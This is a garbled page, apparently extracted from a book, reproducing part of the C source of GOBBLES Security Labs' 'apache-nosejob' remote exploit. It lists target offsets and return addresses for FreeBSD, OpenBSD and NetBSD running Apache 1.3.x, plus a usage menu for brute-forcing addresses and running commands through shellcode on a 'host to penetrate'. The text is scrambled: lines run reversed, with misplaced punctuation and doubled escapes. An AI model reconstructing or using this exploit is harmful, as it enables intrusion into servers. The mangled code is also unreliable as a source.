Page 299 - بسم الله الرحمن الرحيم
P. 299

/* int repzero; /* and \\\\0\\'z this many times
                       !targets[] = { // hehe, yes theo, that say OpenBSD here {
 ,{ FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80f3a00, 6, 36"\\\ }
 ,{ FreeBSD 4.5 x86 / Apache/1.3.23 (Unix)\\\", -150, 0x80a7975, 6, 36"\\\ }
             ,{ OpenBSD 3.0 x86 / Apache 1.3.20\\\", -146, 0xcfa00, 6, 36"\\\ }
             ,{ OpenBSD 3.0 x86 / Apache 1.3.22\\\", -146, 0x8f0aa, 6, 36"\\\ }
            ,{ OpenBSD 3.0 x86 / Apache 1.3.24\\\", -146, 0x90600, 6, 36"\\\ }
        ,{ OpenBSD 3.0 x86 / Apache 1.3.24 #2\\\", -146, 0x98a00, 6, 36"\\\ }
             ,{ OpenBSD 3.1 x86 / Apache 1.3.20\\\", -146, 0x8f2a6, 6, 36"\\\ }
            ,{ OpenBSD 3.1 x86 / Apache 1.3.23\\\", -146, 0x90600, 6, 36"\\\ }
            ,{ OpenBSD 3.1 x86 / Apache 1.3.24\\\", -146, 0x9011a, 6, 36"\\\ }
        ,{ OpenBSD 3.1 x86 / Apache 1.3.24 #2\\\", -146, 0x932ae, 6, 36"\\\ }
   OpenBSD 3.1 x86 / Apache 1.3.24 PHP 4.2.1\\\", -146, 0x1d7a00, 6,"\\\ }

                                                                                                ,{ 36
 ,{ NetBSD 1.5.2 x86 / Apache 1.3.12 (Unix)\\\", -90, 0x80eda00, 5, 42"\\\ }
  ,{ NetBSD 1.5.2 x86 / Apache 1.3.20 (Unix)\\\", -90, 0x80efa00, 5, 42"\\\ }
  ,{ NetBSD 1.5.2 x86 / Apache 1.3.22 (Unix)\\\", -90, 0x80efa00, 5, 42"\\\ }
  ,{ NetBSD 1.5.2 x86 / Apache 1.3.23 (Unix)\\\", -90, 0x80efa00, 5, 42"\\\ }
  ,{ NetBSD 1.5.2 x86 / Apache 1.3.24 (Unix)\\\", -90, 0x80efa00, 5, 42"\\\ }

                                                                                          ;victim ,{

                                                                            } (void usage(void
                                                                                                ;int i

                   printf(\\\"GOBBLES Security Labs\\\\t\\\\t\\\\t\\\\t\\\\t- apache-

       ;("\\\printf(\\\"Usage: ./apache-nosejob <-switches> -h host[:80]\\\\n
                             ;("\\\printf(\\\" -h host[:port]\\\\tHost to penetrate\\\\n
                                              ;("\\\printf(\\\" -t #\\\\t\\\\t\\\\tTarget id.\\\\n

;("\\\printf(\\\" Bruteforcing options (all required, unless -o is used!):\\\\n
     ;("\\\printf(\\\" -o char\\\\t\\\\tDefault values for the following OSes\\\\n
                      ;("\\\printf(\\\" \\\\t\\\\t\\\\t(f)reebsd, (o)penbsd, (n)etbsd\\\\n

;("\\\printf(\\\" -b 0x12345678\\\\t\\\\tBase address used for bruteforce\\\\n
                         printf(\\\" \\\\t\\\\t\\\\tTry 0x80000/obsd, 0x80a0000/fbsd,

             printf(\\\" -d -nnn\\\\t\\\\tmemcpy() delta between s1 and addr to

               ;("\\\printf(\\\" \\\\t\\\\t\\\\tTry -146/obsd, -150/fbsd, -90/nbsd.\\\\n
               printf(\\\" -z #\\\\t\\\\t\\\\tNumbers of time to repeat \\\\\\\\0 in the

;("\\\printf(\\\" \\\\t\\\\t\\\\tTry 36 for openbsd/freebsd and 42 for netbsd\\\\n

               printf(\\\" -r #\\\\t\\\\t\\\\tNumber of times to repeat retadd in the

   ;("\\\printf(\\\" \\\\t\\\\t\\\\tTry 6 for openbsd/freebsd and 5 for netbsd\\\\n
                                                         ;("\\\printf(\\\" Optional stuff:\\\\n

            printf(\\\" -w #\\\\t\\\\t\\\\tMaximum number of seconds to wait for
                                                                     ;("\\\shellcode reply\\\\n

       printf(\\\" -c cmdz\\\\t\\\\tCommands to execute when our shellcode

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